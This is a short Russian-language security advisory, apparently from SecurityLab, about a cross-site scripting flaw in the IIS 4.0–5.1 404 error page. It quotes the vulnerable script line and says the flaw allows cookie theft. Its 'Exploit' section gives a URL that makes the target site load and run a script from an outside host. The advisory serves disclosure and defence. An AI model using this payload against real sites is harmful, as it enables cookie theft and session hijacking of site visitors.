Security Lab

Подробности и пример использования межсайтового скриптинга в IIS 4.0-5.1

Дата публикации:11.04.2002
Дата изменения:17.10.2006
Всего просмотров:1050
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Каждый раз, когда IIS сталкивается с 404 ошибкой, отображается страница ошибки, в которую можно включить команды сценария, таким образом, позволяя межсайтовый скриптинг на любом IIS сайте. Если просмотрим 404.htm, мы заметим специфическую линию кода:
document.write( '<A HREF="' + escape(urlresult) + '">' + displayresult +
"</a>");
displayResult берется из данных url от первого:// до следующего / (например http://securitylab.ru/exploit - displayResult=’securitylab.ru’) . Это означает, что мы можем включить наш код сценария перед частью URL пути, закодировав его должным образом. Уязвимость может использоваться для перехвата куки пользователя в уязвимом сайте.

Эксплоит:
http://script@YOUR.TLD/SomeNonExistantPath
Эксплоит будет включать и выполнять http://jscript.dk/test.js на сайте YOUR.TLD, при условии, что YOUR.TLD использует IIS.

Уязвимость найдена в IIS 4.0-5.1 c установленными страницами ошибки.
 

Ссылки: Источник